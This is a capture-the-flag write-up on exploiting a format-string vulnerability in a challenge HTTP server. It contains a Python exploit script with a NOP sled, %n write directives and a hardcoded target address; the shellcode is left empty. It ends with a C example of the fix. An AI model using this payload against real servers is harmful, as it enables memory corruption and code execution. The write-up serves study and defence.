Hellok and I worked on this challenge for quite a long time. We failed to solve it, though we exploited the format string vulnerability successfully.
We spent a lot of time looking for methods to bypass PAM authentication and neglected the quite obvious format string vulnerability.
Let’s first look at the stack layout:
We can see that the lowest 3 bytes of the pointer “format” will be overwritten.
The format string vulnerability is here.
To exploit this format string, we first get some stack addresses exposed using the “%x” format of printf. The code for exploitation is as follows:
```python
import socket
import time
import base64
import random
import struct

# We tried several 71-byte shellcodes and succeeded in our local environment
shellcode = ""  # placeholder: the shellcode bytes are not included in this write-up

IP = "18.104.22.168"
PORT = 1024

buf = 'GET '
buf += '/'
buf += ' HTTP/1.1'
buf += 'Authorization: Basic '
authkey = base64.b64encode('n:1')
buf += authkey
buf += "a\x78\xf7\xff\xbf\x79\xf7\xff\xbf\x7a\xf7\xff\xbf\x7b\xf7\xff\xbf"
buf += "\x90" * 250
buf += shellcode
buf += "\x90" * 50
buf += "%117x%165$n%253x%166$n%10x%167$n%192x%168$n"
buf += "." * (508 - len(buf))
buf += "\x94\xf5"

print "*****************"
print "authkey len = ", len(authkey)
print "buf len = ", len(buf)

s = socket.socket()
s.connect((IP, PORT))
s.send(buf)
print s.recv(10000)
```
We didn’t understand SECCOMP_FILTER well, so we failed to execute the shellcode on the remote server. According to other writeups, we know that the key is hidden in the cache, which can be easily captured using the “%s” format of printf.
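The root cause described above, seen from the fixing side, as an added example that is not code from the challenge binary or from the original post. It assumes a hypothetical `struct reply` whose 508-byte buffer sits directly in front of the `format` pointer (the size is taken from the padding length in the script), and shows a bounded copy combined with a literal "%s" format; all function names are illustrative.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ 508                         /* assumed from the padding length in the write-up */
static const char DEFAULT_FORMAT[] = "%s";

/* Hypothetical layout: request buffer directly followed by the printf format pointer. */
struct reply { char buf[BUF_SZ]; const char *format; };

/* Bounded copy: input that does not fit is refused, so no byte can spill into format. */
int reply_set(struct reply *r, const char *src, size_t len)
{
    if (len >= sizeof r->buf) return -1;
    memcpy(r->buf, src, len);
    r->buf[len] = '\0';
    return 0;
}

/* Request bytes are only the argument of a literal "%s"; a changed pointer is corruption. */
int reply_render(char *out, size_t outsz, const struct reply *r)
{
    if (r->format != DEFAULT_FORMAT) return -1;
    return snprintf(out, outsz, "%s", r->buf);
}

/* Constructed input, two bytes longer than the buffer: returns 1 if it is rejected. */
int demo_oversized_rejected(void)
{
    static char big[BUF_SZ + 2];
    struct reply r = { "", DEFAULT_FORMAT };
    memset(big, '.', sizeof big);
    return reply_set(&r, big, sizeof big) == -1 && r.format == DEFAULT_FORMAT;
}

/* Constructed input with conversion directives: returns 1 if it is echoed byte for byte. */
int demo_directives_inert(void)
{
    const char *in = "%117x%165$n";
    char out[64];
    struct reply r = { "", DEFAULT_FORMAT };
    if (reply_set(&r, in, strlen(in)) != 0) return 0;
    return reply_render(out, sizeof out, &r) == (int)strlen(in) && strcmp(out, in) == 0;
}

int main(void)
{
    printf("oversized rejected: %d, directives inert: %d\n",
           demo_oversized_rejected(), demo_directives_inert());
    return 0;
}
```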